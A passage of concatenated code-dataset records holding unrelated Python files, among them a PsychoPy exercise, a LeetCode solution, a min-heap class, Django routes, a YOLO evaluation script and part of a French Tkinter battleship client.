'space'), \n# as quickly as possible anytime the name on the screen matches the name you entered into the box \n# (so if I enter 'Gary' I would have to press 'space' anytime the name 'Gary' shows up). \n# If the participant presses 'space' to the wrong name (false alarm), or misses the name (a miss), show a red X.\n\n\nimport time\nimport sys\nimport random\nfrom psychopy import visual,event,core,gui\n\nuserVar = {'Name' : 'Enter your name'}\ndlg = gui.DlgFromDict(userVar)\n\nnames = open('names.txt', 'r').readlines()\nfirstNames = [name.split(' ')[0] for name in names]\nlastNames = [name.split(' ')[1] for name in names]\n\n\nif userVar['Name'] not in firstNames:\n\n\tdef popupError(text):\n\t\terrorDlg = gui.Dlg(title=\"Error\", pos=(200,400))\n\t\terrorDlg.addText('Error: '+text, color='Red')\n\t\terrorDlg.show()\n\tpopupError('Name Does not exist!')\n\n\nwin = visual.Window([800,600],color=\"black\", units='pix')\nnameStim = visual.TextStim(win,text=\"\", height=40, color=\"white\",pos=[0,0])\nposFB = visual.TextStim(win,text=\"0\", height=40, color=\"green\",pos=[0,0])\nnegFB = visual.TextStim(win,text=\"X\", height=40, color=\"red\",pos=[0,0])\n\nshowFirstName = True\nwhile True:\n\tif showFirstName == True:\n\t\tnameShown = random.choice(firstNames)\n\t\tnameType = 'f'\n\telse:\n\t\tnameShown = random.choice(lastNames)\n\t\tnameType = 'l'\n\tnameStim.setText(nameShown)\n\tnameStim.draw()\n\twin.flip()\n\tspaceKey = event.waitKeys(keyList=['space'], maxWait=1)\n\tif nameShown == userVar['Name']:\n\t\tif spaceKey == None:\n\t\t\tnegFB.draw()\n\t\t\twin.flip()\n\t\t\tcore.wait(.5)\n\n\twin.flip()\n\tcore.wait(.5)\n\twin.flip()\n\tshowFirstName = not showFirstName\n\tif event.getKeys(['q']):\n\t\tbreak","sub_path":"exercise2-8.py","file_name":"exercise2-8.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"263495892","text":"\nimport pyarrow.parquet as pq\nimport pyarrow.csv as pv\n\ncsvfile = 'pressureVacuum.csv'\n\ntb = pv.read_csv(csvfile,parse_options=pv.ParseOptions(delimiter=','))\n\nprint(tb)\n\nparquetfile = 'pressureVacuum.parquet'\n\npq.write_table(tb,parquetfile,compression='BROTLI')\n# {'NONE', 'SNAPPY', 'GZIP', 'LZO', 'BROTLI', 'LZ4', 'ZSTD'}\n\ndf = pq.read_table(parquetfile,columns=None)\n\nprint(df)\n","sub_path":"parquet/pyarrow_arm/pyarrow_test.py","file_name":"pyarrow_test.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"625793377","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n   File Name:   122.py.py \n   Description : \n   Author : cugxy \n   date: 2020/02/15 \n-------------------------------------------------\n   Change Activity:\n          2020/02/15 \n-------------------------------------------------\n\nGiven an array where the i-th element is the price of a given stock on day i,\ndesign an algorithm to compute the maximum profit you can achieve. You may complete as many transactions as you like (buy and sell the stock multiple times).\n\nNote: you may not engage in multiple transactions at the same time (you must sell the stock before you buy again).\n\nExample 1:\n\nInput: [7,1,5,3,6,4]\nOutput: 7\nExplanation: Buy on day 2 (price = 1) and sell on day 3 (price = 5), profit = 5-1 = 4.\n  Then buy on day 4 (price = 3) and sell on day 5 (price = 6), profit = 6-3 = 3.\nExample 2:\n\nInput: [1,2,3,4,5]\nOutput: 4\nExplanation: Buy on day 1 (price = 1) and sell on day 5 (price = 5), profit = 5-1 = 4.\n  Note that you cannot buy on both day 1 and day 2 and sell the shares later,\n  because that would mean taking part in several transactions at once; you must sell before buying again.\nExample 3:\n\nInput: [7,6,4,3,1]\nOutput: 0\nExplanation: In this case no transaction is made, so the maximum profit is 0.\n\n\"\"\"\n\n\nclass Solution:\n    def maxProfit(self, prices):\n        if not prices:\n            return 0\n        s_idx = 0\n        
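# note: the same total can be computed greedily as the sum of every positive\n        # day-over-day gain, i.e. sum(max(prices[k + 1] - prices[k], 0) for k in range(len(prices) - 1));\n        # the run-splitting below reaches the same answer by slicing out ascending runs first\n        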
pricess = []\n for idx, _ in enumerate(prices):\n p = None\n if idx == len(prices) - 1:\n p = prices[s_idx:idx+1]\n if p:\n pricess.append(p)\n break\n if prices[idx] > prices[idx + 1]:\n p = prices[s_idx:idx + 1]\n s_idx = idx + 1\n if p:\n pricess.append(p)\n if not pricess:\n pricess.append(prices)\n rs = 0\n for prices in pricess:\n if not prices or len(prices) == 1:\n continue\n min_v = 2147483647\n r = 0\n for e in prices:\n if e < min_v:\n min_v = e\n elif e - min_v > r:\n r = e - min_v\n rs += r\n return rs\n\n\nif __name__ == '__main__':\n s = Solution()\n if 0:\n p3 = [1,2,3,4,5]\n print(s.maxProfit(p3))\n if 0:\n p1 = [7, 1, 5, 3, 6, 1]\n print(s.maxProfit(p1))\n if 1:\n p2 = [6,1,3,2,4,7]\n print(s.maxProfit(p2))\n pass\n","sub_path":"scripts/leetcode/122.py","file_name":"122.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"537406757","text":"import datetime\r\n\r\ndef Timetable():\r\n now=datetime.datetime.now()\r\n time = now.time()\r\n now = now.weekday()\r\n nownow=now\r\n if now==1 or now == 5 or now == 6:\r\n return '''\r\nСвобода\\n'''\r\n if now == 0:\r\n if nownow==now and int(time.strftime(\"%H\")) * 60 + int(time.strftime(\"%M\")) > 20 * 60 + 5:\r\n now += 1\r\n else:\r\n return '''Расписание на понедельник\\n\\n\r\nИстория механики\\n\r\n12:30 - 14:05\\n\r\n16-24\\n\\n\r\nСпецкурс\\n\r\n15:00 - 16:35\\n\r\n12-06\\n\\n\r\nКафедральный семинар\\n\r\n16:45 - 18:20\\n\r\n12-25\\n\\n\r\nКурс написания научных статей\\n\r\n18:30 - 20:05\\n\r\n12-25\\n'''\r\n if now == 2:\r\n if nownow==now and int(time.strftime(\"%H\")) * 60 + int(time.strftime(\"%M\")) > 14 * 60 + 5:\r\n now += 1\r\n else:\r\n if datetime.strftime('%j')-51 % 14 == 0:\r\n return '''Расписание на среду\\n\\n\r\n Экономика\\n\r\n 10:45 - 12:20\\n\r\n 16-22\\n\\n\r\n Философия\\n\r\n 12:30 - 14:05\\n\r\n 13-06\\n'''\r\n else:\r\n return '''Расписание на среду\\n\\n\r\nФилософия\\n\r\n10:45 - 12:20\\n\r\n16-22\\n\\n\r\nФилософия\\n\r\n12:30 - 14:05\\n\r\n13-06\\n'''\r\n if now == 3:\r\n if nownow==now and int(time.strftime(\"%H\")) * 60 + int(time.strftime(\"%M\")) > 12 * 60 + 20:\r\n now += 1\r\n else:\r\n return '''Расписание на четверг\\n\\n\r\nЭкономика\\n\r\n10:45 - 12:20\\n\r\n12-24\\n'''\r\n if now == 4:\r\n if nownow==now and int(time.strftime(\"%H\")) * 60 + int(time.strftime(\"%M\")) > 12 * 60 + 20:\r\n return '''\r\nСвобода\\n'''\r\n else:\r\n return'''Расписание на пятницу\\n\\n\r\nИстория механики\\n\r\n10:45 - 12:20\\n\r\n16-24\\n'''\r\n\r\n","sub_path":"timetable.py","file_name":"timetable.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"606040492","text":"import torch\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nfrom os import listdir\r\nfrom os.path import isfile, isdir, join\r\nimport models\r\nimport loss\r\nimport loaddata\r\n\r\ncategory=(\r\n\"plane\",\r\n\"ship\",\r\n\"storage-tank\",\r\n\"baseball-diamond\",\r\n\"tennis-court\",\r\n\"basketball-court\",\r\n\"ground-track-field\",\r\n\"harbor\",\r\n\"bridge\",\r\n\"small-vehicle\",\r\n\"large-vehicle\",\r\n\"helicopter\",\r\n\"roundabout\",\r\n\"soccer-ball-field\",\r\n\"swimming-pool\",\r\n\"container-crane\")\r\n\r\ndef _iou(boxes1 , boxes2 ):\r\n\r\n #iou[n,m]=boxes[n]和boxes2[m]的iou x,y,w,h\r\n \"\"\"\r\n xy1_1=boxes_xywh1[:,:2]-(boxes_xywh1[:,2:])*0.5*7\r\n xy2_1=boxes_xywh1[:,:2]+(boxes_xywh1[:,2:])*0.5*7\r\n 
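(annotation: the commented-out lines here convert centre x,y,w,h boxes, apparently scaled for a 7x7 grid, into corner x1,y1,x2,y2 form)\r\n    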
boxes1=torch.cat((xy1_1,xy2_1),1)\r\n\r\n xy1_2=boxes_xywh2[:,:2]-(boxes_xywh2[:,2:])*0.5*7\r\n xy2_2=boxes_xywh2[:,:2]+(boxes_xywh2[:,2:])*0.5*7\r\n boxes2=torch.cat((xy1_2,xy2_2),1)\r\n \"\"\"\r\n n1=boxes1.size(0)\r\n n2=boxes2.size(0)\r\n x1y1max=torch.max(boxes1[:,:2].unsqueeze(1).expand(n1,n2,2),boxes2[:,:2].unsqueeze(0).expand(n1,n2,2),)\r\n x2y2min=torch.min(boxes1[:,2:].unsqueeze(1).expand(n1,n2,2),boxes2[:,2:].unsqueeze(0).expand(n1,n2,2),)\r\n\r\n inter_size= x2y2min - x1y1max\r\n inter_size[inter_size<0]=0.\r\n inter_area=inter_size[:,:,0]*inter_size[:,:,1]\r\n\r\n area1 = ((boxes1[:,2]-boxes1[:,0])*(boxes1[:,3]-boxes1[:,1])).unsqueeze(1).expand(n1,n2)\r\n area2 = ((boxes2[:,2]-boxes2[:,0])*(boxes2[:,3]-boxes2[:,1])).unsqueeze(0).expand(n1,n2)\r\n iou = inter_area/(area1+area2-inter_area)\r\n\r\n return iou\r\n\r\n\r\ndef main(images_path=\"hw2_train_val/val1500/images\",targets_path=\"hw2_train_val/val1500/labelTxt_hbb\"):\r\n\r\n theshold=0.1\r\n\r\n\r\n\r\n testloss=0.\r\n count=0\r\n imgnames,imgs,targets=loaddata.read_val_data(images_path,targets_path)\r\n\r\n net=models.Yolov1_vgg16bn(pretrained=True)\r\n #\r\n net.cuda()\r\n print(type(net))\r\n net.load_state_dict(torch.load(\"train_model66.pth\"))\r\n\r\n for i in range(imgs.size(0)):\r\n img_3_448_448=torch.stack((imgs[i][:,:,0],imgs[i][:,:,1],imgs[i][:,:,2]))\r\n img_3_448_448=img_3_448_448.cuda()\r\n img_3_448_448=img_3_448_448.unsqueeze(0)\r\n img_3_448_448=img_3_448_448.float()\r\n\r\n\r\n output=net(img_3_448_448)\r\n t=targets[i].unsqueeze(0)\r\n t=t.cuda()\r\n\r\n\r\n testloss=testloss+float(loss.trainloss(output,t,5,0.5))\r\n count+=1\r\n \"\"\"\r\n for j in range(16):\r\n looked_data=output[0][:,:,:4]\r\n \"\"\"\r\n\r\n\r\n\r\n print(testloss/count)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"traintest.py","file_name":"traintest.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"57586383","text":"from django.urls import path\nfrom . 
import views\n\n\nurlpatterns = [\n path('', views.indexPage, name='shop-index'),\n path('index/', views.indexPage, name='shop-index'),\n path('products/', views.productsPage, name='shop-products'),\n path('login/', views.loginPage, name='shop-login'),\n path('register/', views.registerPage, name= 'shop-register'),\n path('logout/', views.logoutPage, name= 'shop-logout'),\n path('products/', views.singleProduct, name='shop-individual'),\n path('cart/', views.myCart, name='shop-cart'),\n path('products/add/', views.addCart, name='shop-cartupdate'),\n path('products/delete/', views.deleteCart, name='shop-cartdelete'),\n\n\n]","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"345071919","text":"# Min Heap Construction\n\n# Implement a MinHeap class that supports:\n\n# Building a Min Heap from an input array of integers.\n# Inserting integers in the heap.\n# Removing the heap's minimum / root value.\n# Peeking at the heap's minimum / root value.\n# Sifting integers up and down the heap, which is to be used when inserting and\n# removing values.\n# Note that the heap should be represented in the form of an array.\n\n# Sample Usage\n# array = [48, 12, 24, 7, 8, -5, 24, 391, 24, 56, 2, 6, 8, 41]\n\n# // All operations below are performed sequentially.\n# MinHeap(array): - // instantiate a MinHeap (calls the buildHeap method and\n# populates the heap)\n# buildHeap(array): - [-5, 2, 6, 7, 8, 8, 24, 391, 24, 56, 12, 24, 48, 41]\n# insert(76): - [-5, 2, 6, 7, 8, 8, 24, 391, 24, 56, 12, 24, 48, 41, 76]\n# peek(): -5\n# remove(): -5 [2, 7, 6, 24, 8, 8, 24, 391, 76, 56, 12, 24, 48, 41]\n# peek(): 2\n# remove(): 2 [6, 7, 8, 24, 8, 24, 24, 391, 76, 56, 12, 41, 48]\n# peek(): 6\n# insert(87): - [6, 7, 8, 24, 8, 24, 24, 391, 76, 56, 12, 41, 48, 87]\n\n# Solution\n\ndef swap(array, i, j):\n array[i], array[j] = array[j], array[i]\n\n\nclass MinHeap:\n def __init__(self, array):\n self.heap = self.buildHeap(array)\n\n def buildHeap(self, array):\n parent_index = (len(array) - 2) // 2\n while parent_index >= 0:\n self.siftDown(parent_index, array)\n parent_index -= 1\n return array\n\n def siftDown(self, current_index, heap):\n end_index = len(heap) - 1\n child_one_index = current_index * 2 + 1\n while child_one_index <= end_index:\n child_two_index = current_index * 2 + 2 if current_index * 2 + 2 <= end_index else - 1\n if child_two_index != -1 and heap[child_two_index] < heap[child_one_index]:\n index_to_swap = child_two_index\n else:\n index_to_swap = child_one_index\n if heap[index_to_swap] < heap[current_index]:\n swap(heap, current_index, index_to_swap)\n current_index = index_to_swap\n child_one_index = current_index * 2 + 1\n else:\n break\n\n def siftUp(self, current_index):\n parent_index = (current_index - 1) // 2\n while current_index > 0 and self.heap[current_index] < self.heap[parent_index]:\n swap(self.heap, parent_index, current_index)\n current_index = parent_index\n parent_index = (current_index - 1) // 2\n\n def peek(self):\n if len(self.heap):\n return self.heap[0]\n else:\n return None\n\n def remove(self):\n swap(self.heap, 0, len(self.heap) - 1)\n value = self.heap.pop()\n self.siftDown(0, self.heap)\n return value\n\n def insert(self, value):\n self.heap.append(value)\n self.siftUp(len(self.heap) - 
1)","sub_path":"medium/min_heap_construction.py","file_name":"min_heap_construction.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"379218217","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport time\nimport os\n\nfrom datetime import datetime\n\nfrom tvm.common import io\nfrom tvm.common.tvcollection import TVCollection\n\n\ndef _build_record_from_path(path):\n \"\"\"Builds an episode dict entry given the path to an episode on disk.\n\n Args:\n path (str): The absolute path to an episode.\n\n Returns:\n dict: An episode record as a dictionary.\n\n \"\"\"\n path, episode = os.path.split(path)\n episode, _ = os.path.splitext(episode)\n\n path, season = os.path.split(path)\n _, title = os.path.split(path)\n return {'season': season, 'episode': episode, 'title': title}\n\n\ndef find_records(path, include_recorded=False):\n \"\"\"Given a directory `path` to a series, find all episode records.\n\n Episode records will be in the form of a dictionary. The `recorded_at`\n time will be based on the file's created at timestamp. All hidden files\n (i.e. files starting with a period) are ignored from the list of episodes.\n\n Args:\n path (str): The absolute path to a series directory.\n included_recorded (Optional[bool]): Determines whether or not to also\n include episodes that we've recorded in the past. Defaults to False.\n\n Returns:\n list: A list of episode dictionaries found under the `path` directory.\n\n \"\"\"\n dt_mask = '%a %b %d %H:%M:%S %Y'\n\n records = []\n for dir_name, dirs, file_names in os.walk(path):\n dirs[:] = [d for d in dirs if not d.startswith('.')]\n for filename in file_names:\n if filename.startswith('.'):\n continue\n\n record_path = os.path.join(dir_name, filename)\n record = _build_record_from_path(record_path)\n\n # Record already recorded and we're skipping included records.\n if record in TVCollection and not include_recorded:\n continue\n\n created_at = time.ctime(os.path.getmtime(record_path))\n record.update({\n 'recorded_at': datetime.strptime(created_at, dt_mask),\n 'viewed_at': []\n })\n records.append(record)\n return records\n\n\ndef print_records(records):\n records = sorted(records, key=lambda r: r['recorded_at'])\n for record in records:\n io.info2('{recorded_at},{title},{season},{episode}'.format(**record))\n","sub_path":"tvm/apps/create/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"614521105","text":"import open3d as o3d\nimport os\nimport re\n\ndef sorted_aphanumeric(data):\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n return sorted(data, key=alphanum_key)\n\npcd = o3d.io.read_point_cloud(\"pointcloud.txt\", format='xyz')\npcd.transform([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\n\ndirlist = sorted_aphanumeric(os.listdir('.'))\n\nfor file in dirlist:\n if file.startswith('viz'):\n print(file)\n votes0 = o3d.io.read_point_cloud(file, format='xyz')\n votes0.paint_uniform_color([0, 0, 0])\n votes0.transform([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\n o3d.visualization.draw_geometries([pcd, votes0], 
window_name=file[:-10])\n","sub_path":"votenet/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"454675915","text":"#!/usr/local/bin/python3.8\n# -*-coding:Utf-8 -*\nfrom threading import Thread\nfrom threading import RLock\nfrom tkinter import *\nfrom tkinter.ttk import *\nimport pickle\nfrom src.classes.Joueur import *\nfrom src.classes.StructureJoueurs import *\nfrom src.interface_graphique.InterfaceHorsLigne import *\nimport socket\nimport os\nimport time\nfrom src.classes.Partie import *\nfrom src.fonctions.fonctionsInterface import *\n\nclass InterfaceJeuEL(Frame) :\n\tdef __init__(self,fenetre,serveur,joueur,**kwargs) :\n\t\tfenetre.title(\"BattleShip v1 (hors-ligne) \"+joueur.pseudo)\n\t\tFrame.__init__(self, fenetre, width=500, height=700, **kwargs)\n\t\tself.serveur = serveur\n\t\tself.pack(fill=BOTH)\n\t\tself.tst = True\n\t\tself.tstDamier = False\n\t\tself.partieEnCours = True\n\t\tself.fenetre = fenetre\n\t\tself.joueur = joueur\n\t\tself.aPlace = False\n\t\tself.timer = time.time()\n\t\tself.joueur.debutPartie()\n\t\tself.IA = Joueur(\"Ordinateur\")\n\t\tself.d1 = Damier()\n\t\tself.d2 = Damier()\n\t\tself.message = Label(self,text=\"Etape 1 : Placez vos bateaux\")\n\t\tstyle = Style()\n \n\t\tstyle.theme_use('default')\n \n\t\tstyle.configure(\"blue.Horizontal.TProgressbar\", background='blue')\n\t\tself.barreCherche = Progressbar(self,length=100,style=\"blue.Horizontal.TProgressbar\")\n\t\tself.message.pack(fill=X)\n\t\tself.partie = Partie(self.joueur,self.d1,self.IA,self.d2)\n\t\t#self.partie.placerIA()\n\t\tself.partie.tour[0] = self.joueur\n\t\tself.d2 = self.partie.grille2\n\t\tself.grillePerso = GrillePlacement(self,self.partie)\n\t\tself.grilleTir = GrilleTirEL(self,self.grillePerso,self.partie,self.joueur,self.serveur)\n\t\tself.message.pack()\n\t\tself.grillePerso.pack()\n\t\tself.grilleTir.pack(padx=60)\n\t\tself.valider = Button(self,text=\"Valider\",fg=\"white\",bg=\"green\",command=self.valider)\n\t\tself.valider.pack()\n\t\tself.quitter = Button(self,text=\"Quitter\",command=self.quit,fg=\"black\",bg=\"red\")\n\t\tself.quitter.pack()\n\n\tdef quit(self) :\n\t\tself.tst = False\n\t\tif(self.partieEnCours) :\n\t\t\tself.joueur.partieELPerdue()\n\t\tif(not self.tstDamier) :\n\t\t\tself.serveur.send(\"abandon\")\n\t\tself.serveur.send(b\"arret jeu\")\n\t\ttime.sleep(0.1)\n\t\tself.serveur.send(b\"joueur deconnecte\")\n\t\ttime.sleep(0.1)\n\t\tself.serveur.send(pickle.dumps(self.joueur))\n\t\ttime.sleep(0.1)\n\t\tself.serveur.send(b\"fin exit(0)\")\n\t\ttime.sleep(0.1)\n\t\tself.destroy()\n\t\tself.fenetre.destroy()\n\n\tdef valider(self) :\n\t\tif(self.grillePerso.remplie()) :\n\t\t\tself.grillePerso.disableGrille()\n\t\t\t#print(self.partie.grille1)\n\t\t\t#print(self.partie.grille2)\n\t\t\tself.message.config(text=\"Etape 2 : Attente du joueur adverse\")\n\t\t\tself.valider.destroy()\n\t\t\tself.grillePerso.valider.destroy()\n\t\t\tself.grillePerso.choix.pA.destroy()\n\t\t\tself.grillePerso.choix.cT.destroy()\n\t\t\tself.grillePerso.choix.c.destroy()\n\t\t\tself.grillePerso.choix.t.destroy()\n\t\t\tself.grillePerso.choix.sM.destroy()\n\t\t\tself.tstDamier = True\n\t\t\tself.serveur.send(b\"envoi damier\")\n\t\t\ttime.sleep(0.1)\n\t\t\tself.serveur.send(pickle.dumps(self.grillePerso.damier))\n\t\t\ttime.sleep(0.1)\n\t\t\tself.serveur.send(pickle.dumps(self.joueur))\n\t\t\t_osef = self.serveur.recv(9999).decode()\n\t\t\tretour = 
\"attente\"\n\t\t\t#print(retour)\n\t\t\tself.tstCherche = True\n\t\t\tself.barreCherche.pack()\n\t\t\twhile(self.tstCherche) :\n\t\t\t\tself.tstCherche = (retour==\"attente\")\n\t\t\t\ttime.sleep(0.1)\n\t\t\t\tself.serveur.send(b\"attente damier\")\n\t\t\t\tretour = self.serveur.recv(9999).decode()\n\t\t\t\tif(retour!=\"attente\") :\n\t\t\t\t\tbreak\n\t\t\t\tself.barreCherche.step()\n\t\t\t\ttry :\n\t\t\t\t\tself.barreCherche.update()\n\t\t\t\t\tself.update()\n\t\t\t\texcept :\n\t\t\t\t\tpass\n\t\t\tself.barreCherche.destroy()\n\t\t\tif(retour==\"partie\") :\n\t\t\t\tself.partie = pickle.loads(self.serveur.recv(9999))\n\t\t\t\tself.message.config(text=\"Etape 3 : Jouer\")\n\t\t\t\tself.message.update()\n\t\t\t\tself.update()\n\t\t\t\tif(self.partie.tour[0].pseudo == self.joueur.pseudo) :\n\t\t\t\t\tself.grilleTir.actualiserPartie()\n\t\t\t\t\tself.grilleTir.enableGrille()\n\t\t\t\telse :\n\t\t\t\t\t#self.serveur.send(b\"attente joueur\")\n\t\t\t\t\tretour2 = self.serveur.recv(9999).decode()\n\t\t\t\t\tself.partie = pickle.loads(self.serveur.recv(9999))\n\t\t\t\t\tself.grillePerso.partie = self.partie\n\t\t\t\t\tfor bouton, val in self.grillePerso.grille.listeCases :\n\t\t\t\t\t\ty, x = decoder(bouton.getCoord())\n\t\t\t\t\t\tif(self.partie.joueur1.pseudo == self.joueur.pseudo) :\n\t\t\t\t\t\t\tif(self.partie.grille1.getValue(x,y)==-1) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"grey\")\n\t\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==-2) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"red\")\n\t\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==-3) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"black\")\n\t\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==1) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"green\")\n\t\t\t\t\t\t\telse :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"white\")\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tif(self.partie.grille2.getValue(x,y)==-1) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"grey\")\n\t\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==-2) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"red\")\n\t\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==-3) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"black\")\n\t\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==1) :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"green\")\n\t\t\t\t\t\t\telse :\n\t\t\t\t\t\t\t\tbouton.config(bg = \"white\")\n\t\t\t\t\tself.grilleTir.actualiserPartie()\n\t\t\t\t\tself.grilleTir.enableGrille()\n\t\t\t\t\t\n\t\t\telse :\n\t\t\t\tself.partieEnCours = False\n\t\t\t\tself.message.config(text=\"Le joueur adverse a abandonné...\")\n\t\t\t\tself.joueur.partieELGagnee()\n\n\nclass GrilleTirEL(Frame) :\n\tdef __init__(self,interface,grille,partie,joueur,serveur,**kwargs) :\n\t\tFrame.__init__(self,interface,width = 330,height = 390, **kwargs)\n\t\tself.joueur = joueur\n\t\tself.serveur = serveur\n\t\tself.etat = \"disabled\"\n\t\tself.partie=partie\n\t\tself.grillePerso = grille\n\t\tself.listeBateau = partie.grille2.listeBateau\n\t\tself.interface=interface\n\t\tself.damier = partie.grille2\n\t\tlisteAbs = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\"]\n\t\tlisteOrd = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\"]\n\t\tself.listeRadio = []\n\t\tLabel(self).grid(row = 0,column=0)\n\n\t\tfor i in range(10):\n\t\t\tLabel(self,text=listeAbs[i],bg=\"white\").grid(column=i+1+15,row=0)\n\t\t\tLabel(self,text=listeOrd[i],bg=\"white\").grid(column=0+15,row=i+1)\n\t\tself.valeur=StringVar()\n\t\tfor i in range(10):\n\t\t\tfor j in range(10):\n\t\t\t\trb = Radiobutton(self, variable=self.valeur, 
value=encoder(i,j),cursor=\"target\")\n\t\t\t\tif(self.damier.getValue(i,j)==-1) :\n\t\t\t\t\trb.config(bg=\"grey\",fg=\"red\",state=\"disabled\")\n\t\t\t\telif(self.damier.getValue(i,j)==-2) :\n\t\t\t\t\trb.config(bg=\"red\",fg=\"white\",state=\"disabled\")\n\t\t\t\telif(self.damier.getValue(i,j)==-3) :\n\t\t\t\t\trb.config(bg=\"green\",fg=\"red\",state=\"disabled\")\n\t\t\t\telse :\n\t\t\t\t\trb.config(bg=\"white\",fg=\"black\",state=\"disabled\")\n\t\t\t\trb.grid(row=j+1, column=15+i+1)\n\t\t\t\trb.deselect()\n\t\t\t\tself.listeRadio.append(rb)\n\n\t\tself.bouton_tirer = Button(self,text=\"Tirer\",bg=\"red\",fg=\"white\",command=self.tirer,state=\"disabled\",cursor=\"target\")\n\t\tself.bouton_tirer.grid(column=3+15,row=17,columnspan=5)\n\t\t#self.bouton_secours = Button(self,text=\"DEBLOQUE!\",bg=\"red\",fg=\"white\",command=self.enableGrille)\n\t\t#self.bouton_secours.grid(column=3,row=13,columnspan=5)\n\t\tself.texte = Label(self,text=\"\")\n\n\tdef enableGrille(self) :\n\t\tself.etat=\"enabled\"\n\t\tfor rb in self.listeRadio :\n\t\t\tif(rb.cget(\"bg\")==\"white\") :\n\t\t\t\trb.config(state=\"normal\")\n\t\t\t\trb.select()\n\t\tself.bouton_tirer.config(state=\"normal\")\n\n\tdef actualiserPartie(self) :\n\t\tself.partie = self.interface.partie\n\t\tif(self.partie.joueur1.pseudo==self.joueur.pseudo) :\n\t\t\tself.listeBateau = self.partie.grille2.listeBateau\n\t\telse :\n\t\t\tself.listeBateau = self.partie.grille1.listeBateau\n\n\tdef tirer(self) :\n\t\ttry :\n\t\t\tself.partie.tirer(self.valeur.get())\n\t\texcept ToucheException :\n\t\t\tfor rb in self.listeRadio :\n\t\t\t\tif(rb.cget(\"value\")==self.valeur.get()) :\n\t\t\t\t\trb.config(bg=\"red\",state=\"disabled\")\n\t\t\t\trb.config(state=\"disabled\")\n\t\t\t\trb.update()\n\t\t\t\tself.update()\n\t\t\t\tself.interface.update()\n\t\texcept ToucheCouleException :\n\t\t\tposition = []\n\t\t\tfor bat in self.listeBateau :\n\t\t\t\t#print(bat.getPosition)\n\t\t\t\tif(self.valeur.get() in bat.getPosition()) :\n\t\t\t\t\tposition = bat.getPosition()\n\t\t\tfor coord in position :\n\t\t\t\tfor rb in self.listeRadio :\n\t\t\t\t\tif(rb.cget(\"value\")==coord) :\n\t\t\t\t\t\trb.config(bg=\"green\",state=\"disabled\")\n\t\t\t\t\trb.config(state=\"disabled\")\n\t\t\t\t\trb.update()\n\t\t\t\t\tself.update()\n\t\t\t\t\tself.interface.update()\n\t\texcept NoHarmException :\n\t\t\tfor rb in self.listeRadio :\n\t\t\t\tif(rb.cget(\"value\")==self.valeur.get()) :\n\t\t\t\t\trb.config(bg=\"grey\",state=\"disabled\")\n\t\t\t\trb.config(state=\"disabled\")\n\t\t\t\trb.update()\n\t\t\t\tself.update()\n\t\t\t\tself.interface.update()\n\n\t\tself.bouton_tirer.config(state=\"disabled\")\n\t\tself.etat = \"disabled\"\n\t\tself.serveur.send(b\"a joue\")\n\t\ttime.sleep(0.1)\n\t\tself.serveur.send(pickle.dumps(self.partie))\n\t\ttime.sleep(0.1)\n\t\tif(self.partie.testFin()) :\n\t\t\tself.partieEnCours = False\n\t\t\tself.serveur.send(b\"fin partie\")\n\t\t\ttime.sleep(0.1)\n\t\t\tself.joueur.finPartie()\n\t\t\tself.serveur.send(pickle.dumps(self.joueur))\n\t\t\t\"\"\"file = open(\"../localdata/dataJoueur\",\"wb\")\n\t\t\tpickle.dump(self.joueur,file)\n\t\t\tfile.close()\"\"\"\n\t\t\tif(self.partie.gagnant.pseudo==self.joueur.pseudo) :\n\t\t\t\tself.interface.message.config(text=\"Vous avez 